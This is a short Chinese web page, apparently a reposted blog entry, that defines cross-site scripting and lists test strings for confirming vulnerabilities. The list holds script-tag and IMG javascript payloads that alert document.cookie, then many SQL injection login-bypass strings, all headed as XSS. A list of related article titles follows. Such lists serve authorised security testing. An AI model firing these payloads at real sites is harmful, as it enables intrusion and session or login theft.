XSS漏洞验证语句
来源:互联网 发布:php beast 编辑:程序博客网 时间:2024/05/17 23:13
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
相关测试代码,可供漏洞验证:
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<IMG SRC=”javascript:alert(’XSS’);”>
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
admin’–
’ or 0=0 –
“ or 0=0 –
or 0=0 –
’ or 0=0 #
“ or 0=0 #
or 0=0 #
’ or ’x’=’x
“ or ”x”=”x
’) or (’x’=’x
’ or 1=1–
“ or 1=1–
or 1=1–
’ or a=a–
“ or ”a”=”a
’) or (’a’=’a
“) or (“a”=”a
hi” or ”a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ’a’=’a
hi’) or (’a’=’a
hi”) or (“a”=”a
- XSS漏洞验证语句
- Sql语句密码验证漏洞
- XSS漏洞
- XSS漏洞
- Sql语句密码验证的漏洞
- 如何测试XSS漏洞
- xss漏洞简要分析
- Xss漏洞检测
- 找寻xss漏洞
- Xss漏洞到底是什么
- 关于XSS漏洞-简介
- pentesterlab xss漏洞分析
- XSS漏洞的分类
- XSS漏洞的分类
- 预防XSS漏洞攻击
- XSS漏洞演示
- 如何测试XSS漏洞
- XSS漏洞修复
- 修改Struts2默认的模板配置
- 手工注入之jsp篇
- C语言复习 -- 指针自增、自减以及*
- 批处理命令--隐藏运行多程序
- 我的2011
- XSS漏洞验证语句
- Wp7资料
- PHP+MySQL环境下SQL Injection攻防总结
- ubuntu学习笔记——shell基础应用(1)
- c语言学习资料 集锦
- How To Hack The Motorola XOOM Android Tablet (Rooting Guide)
- 解析Domain
- Sql Server 手工注入总结(显错模式)
- 新年到来两天,把mxgraph1.9.0.2给破解了.爽一把先...